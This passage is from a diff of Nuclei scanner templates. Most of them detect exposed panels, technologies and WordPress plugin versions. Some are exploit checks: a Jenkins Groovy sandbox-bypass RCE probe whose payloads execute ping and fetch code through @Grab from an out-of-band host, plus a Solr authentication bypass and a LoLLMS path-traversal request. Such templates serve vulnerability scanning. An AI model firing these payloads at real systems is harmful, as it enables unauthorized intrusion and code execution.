    - https://github.com/purple-WL/Jenkins_CVE-2019-1003000
    - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
  metadata:
    verified: true
    max-request: 6
    vendor: jenkins
    product: script_security
  tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated
 variables:
  username: admin
  vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
  app_name: "{{rand_text_alpha(8)}}"
 flow: http(1) && http(2) && (http(3) || http(4))
 http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        part: body
        words:
          - "jenkins"
        internal: true
        case-insensitive: true
  - raw:
      - |
        POST /j_acegi_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(tolower(body_2), "jenkins", "/logout")'
        internal: true
  - raw:
      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
        Host: {{Hostname}}
    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
  - raw:
      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
      - type: word
        part: interactsh_request
        words:
          - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"
 # digest: 4b0a0048304602210085a1faf7a3de1a102f1ab5fde71db42124776cb68e66f315bdaa1a141107750b0221008549adaf38ad9247d2a2c9a8ea35e4672abe0f3ebe12c70656f9d4b465180de8:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2023/CVE-2023-43373.yaml
+++ b/http/cves/2023/CVE-2023-43373.yaml
@ -29,6 +29,8 @@ info:
    shodan-query: title:"hoteldruid"
  tags: cve,cve2023,hoteldruid,sqli
 flow: http(1) && http(2)
 http:
  - raw:
      - |
@ -75,4 +77,4 @@ http:
          - 'duration>=7'
          - 'status_code == 200'
        condition: and
-# digest: 490a004630440220426178e5e13df0a4daa682781ac97854701957df13929ffa4be8d50718e1bf9502203b84b0e0d9ca568e80cc134cdf687fd31a671acb7ce058711350479d847a98d1:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022030ef02bb52bc805a7e33565d8aa7d9f01ab2cf69c50588e3c11da240c7f0649f022005aef1f95560a51cf024af4198c11a1dee30147872075fe058d0b6ec6ea403d4:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-45216.yaml
+++ b/http/cves/2024/CVE-2024-45216.yaml
@ -0,0 +1,54 @@
 id: CVE-2024-45216
 info:
  name: Apache Solr - Authentication Bypass
  author: gumgum
  severity: critical
  description: |
    Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass.A fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path.This fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing.This issue affects Apache Solr- from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0.
  impact: |
    Users are recommended to upgrade to version 9.7.0, or 8.11.4, which fix the issue.
  reference:
    - https://shfsec.com/cve-2024-45216-authentication-bypass-in-apache-solr
    - https://nvd.nist.gov/vuln/detail/CVE-2024-45216
    - https://solr.apache.org/security html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-45216
    cwe-id: CWE-863,CWE-287
    epss-score: 0.00043
    epss-percentile: 0.09834
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"Apache Solr"
  tags: cve,cve2024,apache,solr,auth-bypass
 http:
  - raw:
      - |
        GET /solr/admin/info/properties:/admin/info/key HTTP/1.1
        Host: {{Hostname}}
        SolrAuth: {{to_lower(rand_text_alpha(5))}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "responseHeader"
          - "system.properties"
          - "solr.script"
          - "solr.solr.home"
        condition: and
      - type: word
        part: content_type
        words:
          - 'application/json'
      - type: status
        status:
          - 200
 # digest: 490a004630440220686c4dc5a7404e068801bbf4a05feb2a6b42c4aa0447a3c98d2260a28401c0bd02207019e32df34b848766b71256f8a8819b5b405d110e92cb54886118b69f7dcfbe:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-4841.yaml
+++ b/http/cves/2024/CVE-2024-4841.yaml
@ -0,0 +1,63 @@
 id: CVE-2024-4841
 info:
  name: LoLLMS WebUI - Subfolder Prediction via Path Traversal
  author: s4e-io
  severity: medium
  description: |
    A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.
  impact: |
    By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint.
  reference:
    - https://huntr.com/bounties/740dda3e-7104-4ccf-9ac4-8870e4d6d602
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4841
  classification:
    cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4
    cve-id: CVE-2024-4841
    cwe-id: CWE-29
    epss-score: 0.00043
    epss-percentile: 0.09834
  metadata:
    max-request: 1
    fofa-query: "LoLLMS WebUI - Welcome"
  tags: cve,cve2024,lollms-webui,traversal
 variables:
  folder: "{{to_upper(rand_text_alpha(10))}}"
 flow: http(1) && http(2)
 http:
  - raw:
      - |
        POST /add_reference_to_local_model HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        {"path":"\\Users"}
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"status\":true}")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
  - raw:
      - |
        POST /add_reference_to_local_model HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        {"path":"\\{{folder}}"}
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"status\":false,\"error\":\"Model not found\"}")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
 # digest: 4a0a0047304502204f4c2aacf87ed18aff38311690978c406fb6a1dc23e5f457678f31d955b3a280022100e3b93ae82571b2d42991d9119cae66f5053c2dd8bfa8b52b705b1bb8a3ee306b:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-6420.yaml
+++ b/http/cves/2024/CVE-2024-6420.yaml
@ -0,0 +1,62 @@
 id: CVE-2024-6420
 info:
  name: Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure
  author: jpg0mez
  severity: high
  description: |
    The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
  remediation: Fixed in 5.2.02
  reference:
    - https://wpscan.com/vulnerability/dfda6577-81aa-4397-a2d6-1d736f9ebd44/
    - https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6420
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2024-6420
    epss-score: 0.00043
    epss-percentile: 0.09914
  metadata:
    verified: true
    max-request: 2
    framework: wordpress
    fofa-query: body="/wp-content/plugins/hide-my-wp"
    publicwww-query: "/wp-content/plugins/hide-my-wp/"
  tags: cve,cve2024,bypass,wp,wp-plugin,wpscan,wordpress,hide-my-wp
 flow: http(1) && http(2)
 http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/hide-my-wp")'
          - 'status_code == 200'
        condition: and
        internal: true
  - method: GET
    path:
      - "{{BaseURL}}/?gf_page=randomstring"
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(location), 'wp-login.php')"
      - type: word
        part: header
        words:
          - '%2F%3Fgf_page%3Drandomstring&reauth=1'
    extractors:
      - type: kval
        kval:
          - location
 # digest: 4b0a00483046022100a0b13d185f443723c7e88f0dd3e31617978792e99fc4c83da014daaa337f9877022100c831aab59bcd0ca39f4a7e840ac9e2bb2b416da2935d7bd4d4acafb0621946b2:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2024/CVE-2024-7928.yaml
+++ b/http/cves/2024/CVE-2024-7928.yaml
@ -2,7 +2,7 @@ id: CVE-2024-7928
 info:
  name: FastAdmin < V1.3.4.20220530 - Path Traversal
-  author: s4e-io
+  author: s4e-io,Hel10-Web
  severity: medium
  description: |
    A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
@ -48,4 +48,4 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a0047304502206a03af2bd622586d9ea3423ce05fb8c99fe1ec1940335aca969aece8642d4cf9022100e4fa51cfa54ae2d026551a9ff270d3e4c5e52c4645e364558c90b77f36d71458:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220385c532d368b3808a915a79463997ddb6ff8018a20199b4998af4174f576745c022100f711195a605eb802382565dc482c781c169d00258730209652591d41dee479ec:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/cyberpanel-panel.yaml
+++ b/http/exposed-panels/cyberpanel-panel.yaml
@ -0,0 +1,36 @@
 id: cyberpanel-panel
 info:
  name: Cyberpanel Login Panel - Detect
  author: mailler
  severity: info
  description: |
    Cyberpanel login panel was detected.
  reference:
    - https://cyberpanel.net/KnowledgeBase/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
    cwe-id: CWE-200
  metadata:
    max-request: 1
    shodan-query: html:"cyberpanel"
    fofa-query: app="Cyberpanel"
    product: cyberpanel
  tags: cyberpanel,panel,login,detect
 http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "<title>(.*)CyberPanel(.*)</title>"
      - type: status
        status:
          - 200
 # digest: 4a0a004730450221008907aa96c27405c826857b7ef745657707e1e19fbd3ba3dd43a39f946de135a202207caab45a1862b88cf7a747d3dfd54d12af83fe04ab50dac000e131e30c833372:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/quivr-panel.yaml
+++ b/http/exposed-panels/quivr-panel.yaml
@ -0,0 +1,28 @@
 id: quivr-panel
 info:
  name: Quivr Panel - Detect
  author: s4e-io
  severity: info
  description: |
    Quivr panel was discovered.
  reference:
    - https://github.com/QuivrHQ/quivr
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="848114197"
  tags: panel,login,quivr,detect
 http:
  - method: GET
    path:
      - "{{BaseURL}}/login"
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<title>Quivr - Get a Second Brain", "data-sentry-component=\"QuivrLogo\"")'
          - 'status_code == 200'
        condition: and
 # digest: 4a0a0047304502202e8eac84bfdc975779f3da9230f56f83b71d7b759680e7980c8f2e9a92f7f9bf02210094cb04c2138934c3c51cefe1ee16376b4de75eb73ed1e4f568df35f99abd334c:922c64590222798bb761d5b6d8e72950
--- a/http/iot/ip-webcam.yaml
+++ b/http/iot/ip-webcam.yaml
@ -0,0 +1,27 @@
 id: ip-webcam
 info:
  name: IP Webcam Viewer Page - Detect
  author: gy741
  severity: low
  description: |
    Searches for exposed webcams by querying the  endpoint and the existence of IP Webcam in the body.
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-601917817
  tags: webcam,iot,detect
 http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        part: body
        words:
          - '<title>IP Webcam</title>'
          - 'Pavel Khlebovich'
        condition: and
 # digest: 4b0a00483046022100e5996146b860677c6e4521de9ad42095cecdbd62519c9ea877440a065092d859022100eb1341d93797ad203e767e9b2730b75eeda5e8d7fb83382c7e726710036c043e:922c64590222798bb761d5b6d8e72950
--- a/http/miscellaneous/azure-blob-core-detect.yaml
+++ b/http/miscellaneous/azure-blob-core-detect.yaml
@ -0,0 +1,25 @@
 id: azure-blob-core-detect
 info:
  name: Azure Blob Core Service - Detect
  author: ProjectDiscoveryAI
  severity: info
  description: |
    This template detects the presence of 'blob.core.windows.net' in the response body, indicating potential references to Azure Blob Storage.
  metadata:
    max-request: 1
    verified: true
    shodan-query: html:"blob.core.windows.net"
  tags: azur,blob,detect
 http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        part: response
        words:
          - "blob.core.windows.net"
 # digest: 4a0a00473045022006936d241ffe12fbdc24fb7b8a5ddf0350b5d89186e9652c2b1349cf5bef957c0221008ab50b8b01f5974e0f7f67f5730e16f0df2ffd135509bd3de13a366cbaa904d6:922c64590222798bb761d5b6d8e72950
--- a/http/misconfiguration/thanos-prometheus-exposure.yaml
+++ b/http/misconfiguration/thanos-prometheus-exposure.yaml
@ -2,11 +2,16 @@ id: thanos-prometheus-exposure
 info:
  name: Thanos Prometheus Setup - Exposure
-  author: DhiyaneshDk
+  author: DhiyaneshDk,righettod
  severity: high
  description: |
    Thanos graph endpoint was detected.
  reference:
    - https://thanos.io/
    - https://github.com/thanos-io/thanos
  metadata:
    verified: true
-    max-request: 1
+    max-request: 2
    shodan-query: title:"Thanos | Highly available Prometheus setup"
    fofa-query: icon_hash="29632872"
  tags: thanos,prometheus,exposure,setup,misconfig
@ -15,17 +20,13 @@ http:
  - method: GET
    path:
      - "{{BaseURL}}/graph"
      - "{{BaseURL}}/classic/graph"
-    matchers-condition: and
+    stop-at-first-match: true
    matchers:
-      - type: word
+      - type: dsl
-        words:
+        dsl:
-          - "THANOS_COMPONENT"
+          - 'status_code == 200'
-          - "THANOS_QUERY_URL"
+          - 'contains_all(body, "THANOS_COMPONENT", "THANOS_QUERY_URL") || contains_all(body, "<title>Thanos", "href=\"/classic/\">Thanos</a>")'
        condition: and
-
+# digest: 4b0a00483046022100f8f26aad83b4b0162f73962102847bd51cda6dcb0cb3385b26ce3b0e716cadea022100c63e4a1a2e541904ddd90bff7e095310d93972002ff7952f62c8acc6fd615eb6:922c64590222798bb761d5b6d8e72950
        part: body
      - type: status
        status:
          - 200
 # digest: 4a0a00473045022100d9e1e7479593315b55f53fd69afbc820f042cce7a4a60701e873063a1ff59ac0022000ce3370054049d410c3c2e5bf66ae61582e6d5e1255ab4808a62e399d219a3e:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/favicon-detect.yaml
+++ b/http/technologies/favicon-detect.yaml
@ -3781,8 +3781,13 @@ http:
        dsl:
          - "status_code==200 && (\"1857752096\" == mmh3(base64_py(body)))"
      - type: dsl
        name: "ip-webcam"
        dsl:
          - "status_code==200 && (\"-601917817\" == mmh3(base64_py(body)))"
    extractors:
      - type: dsl
        dsl:
          - 'mmh3(base64_py(body))'
-# digest: 4a0a0047304502200908529273d4bbc48bd1193bca5e97038f56bb88a937f8f0ba9fccba5fa06a78022100b2265e15f2fd199166d137855ffe2835957bebc158eb8007eb322d77fca12b2f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022063790a3b80cf985f1f3386b1b5f5fe412c9f29729f1d2ea319d238f0185084a9022100900b177b1c451c6b0e0383767e9e0f7bf6057f53615495cdb0bb439a342215fe:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/hubble-detect.yaml
+++ b/http/technologies/hubble-detect.yaml
@ -0,0 +1,30 @@
 id: hubble-detect
 info:
  name: Hubble - Detect
  author: righettod
  severity: info
  description: |
    Hubble products was detected.
  reference:
    - https://github.com/cilium/hubble
    - https://docs.cilium.io/en/stable/observability/hubble/
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Hubble UI"
  tags: tech,hubble,detect
 http:
  - method: GET
    path:
      - "{{BaseURL}}"
    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(to_lower(body), "<title>hubble ui enterprise", "<title>hubble ui")'
        condition: and
 # digest: 4a0a00473045022100e506c503ed78af724c35c6b799995acf62a494a03a57211004bfc0b4890ce5c502206dbc547ac892aba8055fc5215264ebaa67c08309ab3ba20f3a1c7684691d1d6c:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/localai-detect.yaml
+++ b/http/technologies/localai-detect.yaml
@ -0,0 +1,33 @@
 id: localai-detect
 info:
  name: LocalAI - Detect
  author: s4e-io
  severity: info
  description: |
    An instance running LocalAI was detected.
  reference:
    - https://github.com/mudler/LocalAI
    - https://localai.io/
  metadata:
    verified: true
    max-request: 1
    vendor: mudler
    product: localai
    fofa-query: "LocalAI API"
    shodan-query: http.favicon.hash:-976853304
  tags: localai,tech,detect
 http:
  - method: GET
    path:
      - "{{BaseURL}}"
    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "alt=\"LocalAI Logo\"", "<title>LocalAI")'
          - 'status_code == 200'
        condition: and
 # digest: 4a0a004730450221009a2d4b221f08c88e0eb9320a33e2be06efb24d9f4764e7fbea6d508bb1d801ca02206f43d083b6202fe6e065c01f47cb46854ed27a37488b44a11c52fa830bf4e74a:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/pghero-detect.yaml
+++ b/http/technologies/pghero-detect.yaml
@ -0,0 +1,29 @@
 id: pghero-detect
 info:
  name: PgHero - Detect
  author: righettod
  severity: info
  description: |
    PgHero products was detected.
  reference:
    - https://github.com/ankane/pghero
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"PgHero"
  tags: tech,pghero,detect
 http:
  - method: GET
    path:
      - "{{BaseURL}}"
    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(to_lower(body), "<title>pghero", "/assets/pghero/", ">pghero</a>")'
        condition: and
 # digest: 4a0a00473045022009d92fd71a4e9a2aed02cffdcf3080aba8948f91890f4704c8a66b72e9dec584022100d5823d5325286af0d924fb1d3458589290a966e434c16769a71d3f2ed461335b:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a0046304402207e579d3bf146793986ce1a614b2845dad63213aa61909dda263a8c9f374568d4022076a1d66940381d23f9923f2eee8c5fd9d184d2e87e0c31ce63de9490d236918e:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a00463044022078bb2cde6119145568ed297ad482ae6a5119ab1ee6795971a51a193fb88ec0150220720d120f63bfd04954da0d88598d2daba540fa929e6b06e423b200ca63493d2a:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a0046304402203d9bded756c85bbbae99c5be599829af055119a9afe898b13c47d7c5825d686302203428bdc0646af8cf1d6fcc589c2de151671e9cac58deb71df0ccc6ca64d28ecf:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a0046304402202909d4be5ca55edb70e88e873cd453842402d7d0729b1223b47dcbdfc33ddd650220354d5616e0cf381f2aebab1ec36725a3938d1137c6b388021b1b2b7e8fe79c2a:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a0047304502203fba70148a94e55a6dc8a3d9382c0ece460d5f9f41cd88d5087422fe7218369a022100a05e77073200ed90b3f89f74e49572f531c0a8ffc8ad61e68de122c518af961e:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a004630440220442c4706420276ce4cb5d7cd067f83ade184e69d8c0d2036a4aa3bb0b14182eb02203f94e2dca686dd1a7f0d3f900b0b80b5c277a75a52f2506ef59689eadd61202d:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4b0a00483046022100be5c6983d5e4eb980d86eef9ac7be6e90fcdb921ce8c2d27fb7f484bd327229e022100ac59b2fd2d6eb23f739b7408e351baff980a4fb79c1f37b31bb079980ba6ede7:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a004730450220758487600b9878a9044fd75fcf9eaafd4e26a4b9e452a444be1712eb24253a5d022100a7565f5a66ca12d436a4ee9c376957e033f7dd74d1fc83d9d1a495e304464781:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4b0a00483046022100be0d25935ae24a5c8e9670f40672cd0324f9cf0d0f792e6be855363fcaf80121022100b8e1c6a095a0f5fec3b3b5c564b9962a0947c531af52b3e5ae094b1173a0b753:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100d9d941b18d4f66d4537a0a0436d5e24c1595845d11a60cb5eee99bf70f4dda3402200eee1405b055c7759177fce468292d13e42014ff969b694c9a7b7b67774e36a1:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4b0a00483046022100d792d64868e7467d4099791651a5b96d10df91ff7e187f26abba2812414f6eff0221008dbe9548053a29094b019156d02c3978788869917eaf4b2dd97cfaf22651d919:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a00463044022030019080f257199760c959f228a578b0db01744dc6608d04cb921766df3c8655022078269944440481eda5083f6c5b33b65becc4e93ae47793ad96584419a003028f:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100826c19e49503df777905d74089e152f70dbcd9bb02da81f5dcc77daa90f49050022030430e88781a4781aa34d5ca7901b6a605e1826a6c5e9f67719a567b0263d232:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100d8c70904955f8ca8f22c3d0859c6b7acbd8a37439cd2e40036b60eace5bec4e2022042ec79f7ed3dd9d0f5ac3c08e67a574b546921977795cf5a15adb626d7669d59:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022023d0575dfa8a8eb54def6ad16d2f3ce189f0da506d0afcc4e50dec9b53e2b7ef02210087ab33f5c440fbf5cce907e640a410662bc666c19c1ce87078e42c77a033cc95:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100e897afbfbd000f78c09999d87ac999ac8a8eb65ce9a24b68a1eef745a50593c30220151cbd8336ab366bf8128fda6cd63484684a2bdd5fe73e3c33965f2ea98c9aa4:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a00463044022077d7e936943a85cbef7e697cd46180569adb3231fb291c9492903a56609cfd5f02206c0dc4e7491beaa34f84e3ea7ec0571b448265b2880e2110f1f307f7d2e9c3f6:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a004630440220478b4dfd048096e72ec81623a3ec06e5f53789f0a479c144fded068fd95c317102203951a547f32ed0714c4fb6e4f60163b5ab798f88a6bd2116cc86c753be67ed2d:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4b0a00483046022100b253c0a231b30bf16e4c846012cfc39f2c804099bf70599953fcdb949a1ca0c4022100aeccecafac14a0954666417c45130fa12d57c53ba2f454428f533356a9e346cc:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/chaty.yaml
+++ b/http/technologies/wordpress/plugins/chaty.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022100894db27207c46fa8f2d62826dacc92a4ff36b1c61ee3d99be6b768f150de1b58022054a49f04fe86ad5c7267ff9313032ead6ae6a4ad6e6d5a168aa2376b6e65a7c7:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 490a00463044022035db143bb6a54a758d45ed561b9a110b01b6bb0d911f89095c782734d0f5369602204423026b2539275b030bf08d45091335f1c0b9a4ffb1c3a2794320ba55bfae24:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@ -46,3 +46,4 @@ http:
        part: body
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
 # digest: 4a0a00473045022065811e00faab1dc733f65e031ce9326dd81bba75676323b39df36ed4966477620221009bb95ef07b17d757adcfc22995b0a505a8abd80841957c2457349ad0c00dab4f:922c64590222798bb761d5b6d8e72950
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
